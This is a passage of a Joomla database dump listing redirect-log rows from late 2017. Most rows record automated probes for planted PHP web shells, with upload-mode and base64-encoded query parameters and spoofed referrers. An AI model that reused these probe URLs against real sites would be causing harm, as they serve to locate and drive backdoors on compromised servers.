00:00:00'),(12468,'http://hallcrestheights.org/tmp/bogel.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',10,0,'2017-11-02 12:35:43','0000-00-00 00:00:00'),(12469,'http://hallcrestheights.org/reasdme.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',10,0,'2017-11-02 12:34:23','0000-00-00 00:00:00'),(12470,'http://hallcrestheights.org/images/stories/0d4y.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',10,0,'2017-11-02 12:35:47','0000-00-00 00:00:00'),(12471,'http://hallcrestheights.org/images/stories/a.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',10,0,'2017-11-02 12:34:27','0000-00-00 00:00:00'),(12472,'http://hallcrestheights.org/b1.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',10,0,'2017-11-02 12:35:49','0000-00-00 00:00:00'),(12473,'http://hallcrestheights.org/images/w0rm.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',10,0,'2017-11-02 12:36:08','0000-00-00 00:00:00'),(12474,'http://hallcrestheights.org/media/jss.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',9,0,'2017-11-02 12:39:04','0000-00-00 00:00:00'),(12475,'http://hallcrestheights.org/media/404.php?z3=UHF0NUZhLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-11-02 12:39:05','0000-00-00 00:00:00'),(12476,'http://hallcrestheights.org/show.php?z3=UHF0NUZhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:42:48','0000-00-00 00:00:00'),(12477,'http://hallcrestheights.org/cache/news.php?z3=UHF0NUZhLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:41:30','0000-00-00 00:00:00'),(12478,'http://hallcrestheights.org/images/head.php?z3=UHF0NUZhLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:42:54','0000-00-00 00:00:00'),(12479,'http://hallcrestheights.org/wp-content/plugins/wp-lg3.php?z3=UHF0NUZhLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:42:57','0000-00-00 00:00:00'),(12480,'http://hallcrestheights.org/wp-content/plugins/wp-lg2.php?z3=UHF0NUZhLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:43:00','0000-00-00 00:00:00'),(12481,'http://hallcrestheights.org/files/files.php?z3=UHF0NUZhLnBocA==&z4=L2ZpbGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:47:17','0000-00-00 00:00:00'),(12482,'http://hallcrestheights.org/wp-content/plugins/caches.php?z3=UHF0NUZhLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:47:20','0000-00-00 00:00:00'),(12483,'http://hallcrestheights.org/tmp/setting.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',9,0,'2017-11-02 12:46:01','0000-00-00 00:00:00'),(12484,'http://hallcrestheights.org/images/stories/webroot.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',9,0,'2017-11-02 12:46:04','0000-00-00 00:00:00'),(12485,'http://hallcrestheights.org/images/stories/u.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',9,0,'2017-11-02 12:47:26','0000-00-00 00:00:00'),(12486,'http://hallcrestheights.org/images/stories/s.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',9,0,'2017-11-02 12:47:27','0000-00-00 00:00:00'),(12487,'http://hallcrestheights.org/images/stories/rekan.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',9,0,'2017-11-02 12:47:28','0000-00-00 00:00:00'),(12488,'http://hallcrestheights.org/cache/list.php?z3=UHF0NUZhLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:48:19','0000-00-00 00:00:00'),(12489,'http://hallcrestheights.org/images/stories/readme.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',9,0,'2017-11-02 12:48:22','0000-00-00 00:00:00'),(12490,'http://hallcrestheights.org/cache/asdf.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',9,0,'2017-11-02 12:49:15','0000-00-00 00:00:00'),(12491,'http://hallcrestheights.org/wp_logns.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',9,0,'2017-11-02 12:50:20','0000-00-00 00:00:00'),(12492,'http://hallcrestheights.org/libraries/joomla/wso.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',9,0,'2017-11-02 12:49:01','0000-00-00 00:00:00'),(12493,'http://hallcrestheights.org/default_component.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',9,0,'2017-11-02 12:50:22','0000-00-00 00:00:00'),(12494,'http://hallcrestheights.org/images/upa.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',9,0,'2017-11-02 12:49:03','0000-00-00 00:00:00'),(12495,'http://hallcrestheights.org/images/stories/ali.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',9,0,'2017-11-02 12:50:24','0000-00-00 00:00:00'),(12496,'http://hallcrestheights.org/images/laj.php?z3=UHF0NUZhLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:51:20','0000-00-00 00:00:00'),(12497,'http://hallcrestheights.org/log.php?z3=UHF0NUZhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:51:25','0000-00-00 00:00:00'),(12498,'http://hallcrestheights.org/includes/u2p.php?z3=UHF0NUZhLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:51:28','0000-00-00 00:00:00'),(12499,'http://hallcrestheights.org/cache/cache_aqbmkwwx.php?z3=UHF0NUZhLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:51:30','0000-00-00 00:00:00'),(12500,'http://hallcrestheights.org/dswat.org/wsdl.php?z3=UHF0NUZhLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:50:13','0000-00-00 00:00:00'),(12501,'http://hallcrestheights.org/site/tmp/cTivrC.php?z3=UHF0NUZhLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:51:35','0000-00-00 00:00:00'),(12502,'http://hallcrestheights.org/plugins/system/mijoshopjquery/mijoshopjquery/superfish/js/htaccess.php',NULL,'http://site.ru','',8,0,'2017-11-02 12:50:20','0000-00-00 00:00:00'),(12503,'http://hallcrestheights.org/wp-main.php?z3=UHF0NUZhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:52:12','0000-00-00 00:00:00'),(12504,'http://hallcrestheights.org/images/robots.txt.php?z3=UHF0NUZhLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:52:14','0000-00-00 00:00:00'),(12505,'http://hallcrestheights.org/cli/40dd1d.php?z3=UHF0NUZhLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:52:17','0000-00-00 00:00:00'),(12506,'http://hallcrestheights.org/images/stories/black.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',9,0,'2017-11-02 12:52:19','0000-00-00 00:00:00'),(12507,'http://hallcrestheights.org/images/upxx.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',9,0,'2017-11-02 12:52:20','0000-00-00 00:00:00'),(12508,'http://hallcrestheights.org/images/stories/gass.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',9,0,'2017-11-02 12:52:20','0000-00-00 00:00:00'),(12509,'http://hallcrestheights.org/libraries/joomla/updater/htaccess.php',NULL,'http://site.ru','',4,0,'2017-11-02 13:13:39','0000-00-00 00:00:00'),(12510,'http://hallcrestheights.org/wp-content/plugins/cache.php',NULL,'http://www.googlebot.com/bot.html','',1,0,'2017-11-02 13:16:21','0000-00-00 00:00:00'),(12511,'http://hallcrestheights.org/sites/all/libraries/elfinder/files/cache.php',NULL,'http://www.googlebot.com/bot.html','',1,0,'2017-11-02 13:15:07','0000-00-00 00:00:00'),(12512,'http://hallcrestheights.org//wp-content/uploads/2017/11/cache.php',NULL,'http://www.googlebot.com/bot.html','',1,0,'2017-11-02 13:16:34','0000-00-00 00:00:00'),(12513,'http://hallcrestheights.org/libraries/joomla/keychain/htaccess.php',NULL,'http://site.ru','',2,0,'2017-11-02 14:04:53','0000-00-00 00:00:00'),(12514,'http://hallcrestheights.org/images/1ndex.php?z3=SWtKSERtLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-03 00:56:19','0000-00-00 00:00:00'),(12515,'http://hallcrestheights.org/maill.php?z3=SWtKSERtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:00:12','0000-00-00 00:00:00'),(12516,'http://hallcrestheights.org/wp-cache.php?z3=SWtKSERtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-03 01:01:57','0000-00-00 00:00:00'),(12517,'http://hallcrestheights.org/robot.php?z3=SWtKSERtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-03 01:02:06','0000-00-00 00:00:00'),(12518,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=SWtKSERtLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:02:37','0000-00-00 00:00:00'),(12519,'http://hallcrestheights.org/SessionController.php?z3=SWtKSERtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:02:40','0000-00-00 00:00:00'),(12520,'http://hallcrestheights.org/webconfig.txt.php?z3=SWtKSERtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:02:44','0000-00-00 00:00:00'),(12521,'http://hallcrestheights.org/robots.txt.php?z3=SWtKSERtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:01:54','0000-00-00 00:00:00'),(12522,'http://hallcrestheights.org/sql_dump.php?z3=SWtKSERtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:02:02','0000-00-00 00:00:00'),(12523,'http://hallcrestheights.org/jconfig.php?z3=SWtKSERtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:03:32','0000-00-00 00:00:00'),(12524,'http://hallcrestheights.org/thumb.php?z3=SWtKSERtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:03:35','0000-00-00 00:00:00'),(12525,'http://hallcrestheights.org/al277.php?z3=SWtKSERtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:04:31','0000-00-00 00:00:00'),(12526,'http://hallcrestheights.org/images/al277.php?z3=SWtKSERtLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:04:34','0000-00-00 00:00:00'),(12527,'http://hallcrestheights.org/wsdl.php?z3=SWtKSERtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:04:37','0000-00-00 00:00:00'),(12528,'http://hallcrestheights.org/wp-data.php?z3=SWtKSERtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:04:40','0000-00-00 00:00:00'),(12529,'http://hallcrestheights.org/media/1ndex.php?z3=SWtKSERtLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:06:06','0000-00-00 00:00:00'),(12530,'http://hallcrestheights.org/media/tmp.php?z3=SWtKSERtLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:04:48','0000-00-00 00:00:00'),(12531,'http://hallcrestheights.org/google-assist.php?z3=SWtKSERtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:06:54','0000-00-00 00:00:00'); INSERT INTO `jos_redirect_links` VALUES (12532,'http://hallcrestheights.org/images/google-assist.php?z3=SWtKSERtLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-11-03 01:06:57','0000-00-00 00:00:00'),(12533,'http://hallcrestheights.org/elements.php?z3=SWtKSERtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:07:19','0000-00-00 00:00:00'),(12534,'http://hallcrestheights.org/cache/defau1t.php?z3=SWtKSERtLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:07:26','0000-00-00 00:00:00'),(12535,'http://hallcrestheights.org/roubt.php?z3=SWtKSERtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:07:31','0000-00-00 00:00:00'),(12536,'http://hallcrestheights.org/bookmark.php?z3=SWtKSERtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:07:37','0000-00-00 00:00:00'),(12537,'http://hallcrestheights.org/wp-content/plugins/wp-footers.php?z3=SWtKSERtLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-11-03 01:09:44','0000-00-00 00:00:00'),(12538,'http://hallcrestheights.org/wp-content/plugins/sql_dump.php?z3=SWtKSERtLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:09:46','0000-00-00 00:00:00'),(12539,'http://hallcrestheights.org/wp-content/plugins/easyrotator-for-wordpress/a.php?z3=SWtKSERtLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy9lYXN5cm90YXRvci1mb3Itd29yZHByZXNzLw==',NULL,'hallcrestheights.org','',1,0,'2017-11-03 01:11:25','0000-00-00 00:00:00'),(12540,'http://hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=SWtKSERtLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:11:27','0000-00-00 00:00:00'),(12541,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=SWtKSERtLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:11:36','0000-00-00 00:00:00'),(12542,'http://hallcrestheights.org/A.php?z3=SWtKSERtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-03 01:13:10','0000-00-00 00:00:00'),(12543,'http://hallcrestheights.org/modules/modules/modules.php?z3=SWtKSERtLnBocA==&z4=L21vZHVsZXMvbW9kdWxlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:11:50','0000-00-00 00:00:00'),(12544,'http://hallcrestheights.org/wp-content/themes/fossy-speurhondenworst/divi-children-engine/divi_children_engine.php?z3=SWtKSERtLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL2Zvc3N5LXNwZXVyaG9uZGVud29yc3QvZGl2aS1jaGlsZHJlbi1lbmdpbmUv',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:13:14','0000-00-00 00:00:00'),(12545,'http://hallcrestheights.org/wp-content/themes/margreetalgra/404.php?z3=SWtKSERtLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL21hcmdyZWV0YWxncmEv',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:13:18','0000-00-00 00:00:00'),(12546,'http://hallcrestheights.org/wp-content/themes/twentyeleven-child/footer.php?z3=SWtKSERtLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWVsZXZlbi1jaGlsZC8=',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:13:27','0000-00-00 00:00:00'),(12547,'http://hallcrestheights.org/sqlbak.php?z3=SWtKSERtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-03 01:13:59','0000-00-00 00:00:00'),(12548,'http://hallcrestheights.org/images/stories/0day.php?z3=SWtKSERtLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:15:01','0000-00-00 00:00:00'),(12549,'http://hallcrestheights.org/install.php?z3=SWtKSERtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:15:04','0000-00-00 00:00:00'),(12550,'http://hallcrestheights.org/goog1es.php?z3=SWtKSERtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-03 01:14:08','0000-00-00 00:00:00'),(12551,'http://hallcrestheights.org/xmlsrpc.php?z3=SWtKSERtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:16:44','0000-00-00 00:00:00'),(12552,'http://hallcrestheights.org/wp-content/plugins/Analyser.php?z3=SWtKSERtLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:16:49','0000-00-00 00:00:00'),(12553,'http://hallcrestheights.org/shootmei.php?z3=SWtKSERtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:16:52','0000-00-00 00:00:00'),(12554,'http://hallcrestheights.org/Abbrevsprl.php?z3=SWtKSERtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:20:36','0000-00-00 00:00:00'),(12555,'http://hallcrestheights.org/bin/pfbbb.php',NULL,'http://site.ru','',6,0,'2017-11-03 01:20:23','0000-00-00 00:00:00'),(12556,'http://hallcrestheights.org/RoseLeif.php?z3=SWtKSERtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-03 01:23:03','0000-00-00 00:00:00'),(12557,'http://hallcrestheights.org/images/xxx.php?z3=SWtKSERtLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-11-03 01:24:56','0000-00-00 00:00:00'),(12558,'http://hallcrestheights.org/wp-content/1ndex.php?z3=SWtKSERtLnBocA==&z4=L3dwLWNvbnRlbnQv',NULL,'hallcrestheights.org','',1,0,'2017-11-03 01:24:11','0000-00-00 00:00:00'),(12559,'http://hallcrestheights.org/cache/support.php?z3=SWtKSERtLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-11-03 01:27:41','0000-00-00 00:00:00'),(12560,'http://hallcrestheights.org/authenticating.php?z3=SWtKSERtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:29:14','0000-00-00 00:00:00'),(12561,'http://hallcrestheights.org/show.php?z3=SWtKSERtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:29:51','0000-00-00 00:00:00'),(12562,'http://hallcrestheights.org/cache/news.php?z3=SWtKSERtLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:28:35','0000-00-00 00:00:00'),(12563,'http://hallcrestheights.org/images/head.php?z3=SWtKSERtLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:29:59','0000-00-00 00:00:00'),(12564,'http://hallcrestheights.org/wp-content/plugins/wp-lg3.php?z3=SWtKSERtLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:30:01','0000-00-00 00:00:00'),(12565,'http://hallcrestheights.org/wp-content/plugins/wp-lg2.php?z3=SWtKSERtLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:28:45','0000-00-00 00:00:00'),(12566,'http://hallcrestheights.org/files/files.php?z3=SWtKSERtLnBocA==&z4=L2ZpbGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:29:52','0000-00-00 00:00:00'),(12567,'http://hallcrestheights.org/wp-content/plugins/caches.php?z3=SWtKSERtLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:31:16','0000-00-00 00:00:00'),(12568,'http://hallcrestheights.org/cache/list.php?z3=SWtKSERtLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:33:00','0000-00-00 00:00:00'),(12569,'http://hallcrestheights.org/libraries/joomla/1ndex.php?z3=SWtKSERtLnBocA==&z4=L2xpYnJhcmllcy9qb29tbGEv',NULL,'hallcrestheights.org','',1,0,'2017-11-03 01:33:30','0000-00-00 00:00:00'),(12570,'http://hallcrestheights.org/images/laj.php?z3=SWtKSERtLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:35:00','0000-00-00 00:00:00'),(12571,'http://hallcrestheights.org/log.php?z3=SWtKSERtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:37:01','0000-00-00 00:00:00'),(12572,'http://hallcrestheights.org/includes/u2p.php?z3=SWtKSERtLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:37:05','0000-00-00 00:00:00'),(12573,'http://hallcrestheights.org/cache/cache_aqbmkwwx.php?z3=SWtKSERtLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:35:50','0000-00-00 00:00:00'),(12574,'http://hallcrestheights.org/dswat.org/wsdl.php?z3=SWtKSERtLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:37:14','0000-00-00 00:00:00'),(12575,'http://hallcrestheights.org/site/tmp/cTivrC.php?z3=SWtKSERtLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',1,0,'2017-11-03 01:35:57','0000-00-00 00:00:00'),(12576,'http://hallcrestheights.org/wp-main.php?z3=SWtKSERtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-03 01:38:30','0000-00-00 00:00:00'),(12577,'http://hallcrestheights.org/images/robots.txt.php?z3=SWtKSERtLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:39:11','0000-00-00 00:00:00'),(12578,'http://hallcrestheights.org/cli/40dd1d.php?z3=SWtKSERtLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-11-03 01:39:15','0000-00-00 00:00:00'),(12579,'http://hallcrestheights.org/bin/ijwbyy.php',NULL,'http://site.ru','',3,0,'2017-11-03 02:00:33','0000-00-00 00:00:00'),(12580,'http://hallcrestheights.org/modules/mod_kankod_copyrights/ystvq.php',NULL,'http://site.ru','',4,0,'2017-11-03 02:33:18','0000-00-00 00:00:00'),(12581,'http://hallcrestheights.org/includes/phpInputFilter/zgcopxq.php',NULL,'http://site.ru','',1,0,'2017-11-03 02:49:08','0000-00-00 00:00:00'),(12582,'http://hallcrestheights.org/modules/dkcqe.php',NULL,'http://site.ru','',3,0,'2017-11-03 03:45:59','0000-00-00 00:00:00'),(12583,'http://hallcrestheights.org/plugins/authentication/twatg.php',NULL,'http://site.ru','',3,0,'2017-11-03 03:49:20','0000-00-00 00:00:00'),(12584,'http://hallcrestheights.org/plugins/authentication/cookie/htaccess.php',NULL,'http://site.ru','',1,0,'2017-11-03 04:46:01','0000-00-00 00:00:00'),(12585,'http://hallcrestheights.org/pqcsfx3h.php',NULL,'http://site.ru','',5,0,'2017-11-03 06:05:29','0000-00-00 00:00:00'),(12586,'http://hallcrestheights.org/includes/cache.inc.php',NULL,'http://site.ru','',3,0,'2017-11-03 07:11:46','0000-00-00 00:00:00'),(12587,'http://hallcrestheights.org/components/com_jshopping/templates/default/content/Dwsonv.php',NULL,'http://site.ru','',1,0,'2017-11-03 07:27:44','0000-00-00 00:00:00'),(12588,'http://hallcrestheights.org/language/en-GB/wp-class.php',NULL,'http://site.ru','',4,0,'2017-11-03 08:09:18','0000-00-00 00:00:00'),(12589,'http://hallcrestheights.org/modules/mod_articles_latest/jkifzdf.php',NULL,'http://site.ru','',3,0,'2017-11-03 09:32:14','0000-00-00 00:00:00'),(12590,'http://hallcrestheights.org/proekt/logo_img.php',NULL,'http://site.ru','',1,0,'2017-11-03 11:00:48','0000-00-00 00:00:00'),(12591,'http://hallcrestheights.org/components/com_ckeditor/Dnewv.php',NULL,'http://site.ru','',2,0,'2017-11-03 11:32:46','0000-00-00 00:00:00'),(12592,'http://hallcrestheights.org/components/admin/bgeiis.php',NULL,'http://site.ru','',1,0,'2017-11-03 12:28:08','0000-00-00 00:00:00'),(12593,'http://hallcrestheights.org/libraries/fof/less/parser/pixfaxx.php',NULL,'http://site.ru','',4,0,'2017-11-03 12:47:23','0000-00-00 00:00:00'),(12594,'http://hallcrestheights.org/images/rocketlauncher/styles/1.php',NULL,'http://site.ru','',2,0,'2017-11-03 13:26:17','0000-00-00 00:00:00'),(12595,'http://hallcrestheights.org/cache/kcjdvht.php',NULL,'http://site.ru','',1,0,'2017-11-03 16:19:01','0000-00-00 00:00:00'),(12596,'http://hallcrestheights.org/plugins/editors-xtd/orlkeap.php',NULL,'http://site.ru','',3,0,'2017-11-03 17:13:22','0000-00-00 00:00:00'),(12597,'http://hallcrestheights.org/modules/mod_related_items/media-views-rtl.php',NULL,'http://site.ru','',4,0,'2017-11-03 17:38:24','0000-00-00 00:00:00'),(12598,'http://hallcrestheights.org/new/media/akeeba_strapper/css/smoothness/content-post.php',NULL,'http://site.ru','',1,0,'2017-11-03 17:41:28','0000-00-00 00:00:00'),(12599,'http://hallcrestheights.org/media/mzumyol.php',NULL,'http://site.ru','',2,0,'2017-11-03 17:43:35','0000-00-00 00:00:00'),(12600,'http://hallcrestheights.org/tmp/i.php',NULL,'http://site.ru','',5,0,'2017-11-03 18:34:09','0000-00-00 00:00:00'),(12601,'http://hallcrestheights.org/plugins/editors/tinymce/jscripts/tiny_mce/themes/tbisw.php',NULL,'http://site.ru','',4,0,'2017-11-03 19:55:01','0000-00-00 00:00:00'),(12602,'http://hallcrestheights.org/media/reviews/photos/original/68/33/f3/degesx.php',NULL,'http://site.ru','',1,0,'2017-11-04 02:40:23','0000-00-00 00:00:00'),(12603,'http://hallcrestheights.org/plugins/editors/tinymce/jscripts/tiny_mce/themes/stiky.php',NULL,'http://site.ru','',3,0,'2017-11-04 03:04:39','0000-00-00 00:00:00'),(12604,'http://hallcrestheights.org/components/com_content/8ibtei.php',NULL,'http://site.ru','',3,0,'2017-11-04 03:10:39','0000-00-00 00:00:00'),(12605,'http://hallcrestheights.org/xmlrpc/kzeaz.php',NULL,'http://site.ru','',1,0,'2017-11-04 03:56:25','0000-00-00 00:00:00'),(12606,'http://hallcrestheights.org/upholsterynet.com/logo_img.php',NULL,'http://site.ru','',1,0,'2017-11-04 06:38:28','0000-00-00 00:00:00'),(12607,'http://www.hallcrestheights.org/jgletkym-drqzn-rvmlkswa-i20162628-zvkecqq-neei-k18940-aqjzl-nplqfc.htm',NULL,'','',1,0,'2017-11-04 10:46:27','0000-00-00 00:00:00'),(12608,'http://hallcrestheights.org/images/stories/index.php',NULL,'http://site.ru','',3,0,'2017-11-04 15:42:08','0000-00-00 00:00:00'),(12609,'http://hallcrestheights.org/images/1ndex.php?z3=a3UyRWFkLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:16:11','0000-00-00 00:00:00'),(12610,'http://hallcrestheights.org/cache/cachee.php?z3=a3UyRWFkLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:17:56','0000-00-00 00:00:00'),(12611,'http://hallcrestheights.org/maill.php?z3=a3UyRWFkLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:18:58','0000-00-00 00:00:00'),(12612,'http://hallcrestheights.org/wp-cache.php?z3=a3UyRWFkLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:19:02','0000-00-00 00:00:00'),(12613,'http://hallcrestheights.org/robot.php?z3=a3UyRWFkLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-04 20:19:42','0000-00-00 00:00:00'),(12614,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=a3UyRWFkLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:19:43','0000-00-00 00:00:00'),(12615,'http://hallcrestheights.org/SessionController.php?z3=a3UyRWFkLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:19:46','0000-00-00 00:00:00'),(12616,'http://hallcrestheights.org/webconfig.txt.php?z3=a3UyRWFkLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-04 